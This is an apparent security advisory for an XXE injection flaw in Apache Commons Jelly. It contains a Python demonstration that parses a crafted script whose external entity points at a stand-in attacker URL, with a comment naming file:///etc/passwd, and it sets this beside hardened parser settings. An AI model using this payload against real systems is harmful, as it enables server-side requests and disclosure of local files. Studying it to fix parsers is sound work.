Apache Commons Jelly is vulnerable to XML external entity (XXE) injection. Jelly scripts are XML files, and the parser that loads them resolves external entities: when a script begins with a custom DOCTYPE whose internal subset declares an entity as SYSTEM with a URL, and the script body references that entity, the parser connects to that URL when the script is instantiated. Anyone who can supply a Jelly script to an application therefore gets the usual XXE outcomes: server-side requests to attacker-chosen hosts and, with a file: URL, disclosure of local file contents wherever the expanded entity is reflected. The fix is tracked in JELLY-293 and the two commits referenced below.
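The behaviour described above, reproduced as an added example that is not Commons Jelly's own code: Jelly parses scripts with a Java SAX parser, and the same mechanism exists in Python's xml.sax, so the example uses that as a stand-in. The Jelly-style script, the entity name xxe and the URL attacker.invalid are constructed for the example. A recording entity resolver stands in for the network so the example runs offline; without it, the parser would open the URL itself, which is exactly what the advisory describes.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, EntityResolver, feature_external_ges
from xml.sax.xmlreader import InputSource

# Constructed Jelly-style script (written for this example, not taken from the
# advisory): the internal DTD subset declares a SYSTEM entity whose system
# identifier is an attacker-chosen URL, and the script body references it.
# Any URL scheme the parser can open would do (http://..., file:///etc/passwd).
MALICIOUS_SCRIPT = b"""<?xml version="1.0"?>
<!DOCTYPE jelly [
  <!ENTITY xxe SYSTEM "http://attacker.invalid/collect">
]>
<j:jelly xmlns:j="jelly:core">
  <j:set var="leak">&xxe;</j:set>
</j:jelly>
"""


class RecordingResolver(EntityResolver):
    """Records every external entity the parser tries to fetch.

    Instead of letting the parser open the URL, it answers with a canned body
    so the example runs offline; the default resolver would perform the request.
    """

    def __init__(self):
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        source = InputSource(systemId)
        source.setByteStream(io.BytesIO(b"<fetched>canned body</fetched>"))
        return source


class ElementCollector(ContentHandler):
    """Collects element names and text so we can see what the entity expanded to."""

    def __init__(self):
        super().__init__()
        self.elements = []
        self.text = []

    def startElement(self, name, attrs):
        self.elements.append(name)

    def characters(self, content):
        self.text.append(content)


def parse_script(data, allow_external_entities):
    """Parse a script with or without external general entity resolution.

    Returns (URLs the parser asked for, element names seen, joined text).
    allow_external_entities=True is the vulnerable configuration; False is the
    hardened one, where the reference is skipped and no fetch is attempted.
    """
    resolver = RecordingResolver()
    collector = ElementCollector()
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, allow_external_entities)
    parser.setEntityResolver(resolver)
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(data))
    return resolver.requested, collector.elements, "".join(collector.text).strip()


if __name__ == "__main__":
    urls, elements, text = parse_script(MALICIOUS_SCRIPT, allow_external_entities=True)
    print("vulnerable: fetched", urls, "-> elements", elements, "text", repr(text))
    urls, elements, text = parse_script(MALICIOUS_SCRIPT, allow_external_entities=False)
    print("hardened:   fetched", urls, "-> elements", elements, "text", repr(text))
```

In the vulnerable configuration the parser asks the resolver for http://attacker.invalid/collect while loading the script and splices whatever comes back into the document; in the hardened configuration the entity reference is simply dropped and no request is made. The Java equivalent for a Xerces-based SAX parser is to set the features http://xml.org/sax/features/external-general-entities and http://xml.org/sax/features/external-parameter-entities to false, or to reject DOCTYPE declarations outright with http://apache.org/xml/features/disallow-doctype-decl, and to apply those settings before any untrusted script is parsed.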
commons.apache.org/proper/commons-jelly/security-reports.html
seclists.org/oss-sec/2017/q3/554
www.securityfocus.com/bid/101052
www.securitytracker.com/id/1039444
github.com/apache/commons-jelly/commit/e3ec3356ed733f25b2840542b29d77aff6cd5c7b
github.com/apache/commons-jelly/commit/ed885dee7d315dcab3e18c17a0ba9823bcce7968
issues.apache.org/jira/browse/JELLY-293
lists.apache.org/thread.html/f1fc3f2c45264af44ce782d54b5908ac95f02bf7ad88bb57bfb04b73@%3Cdev.commons.apache.org%3E
www.blackhat.com/us-17/speakers/Luca-Carettoni.html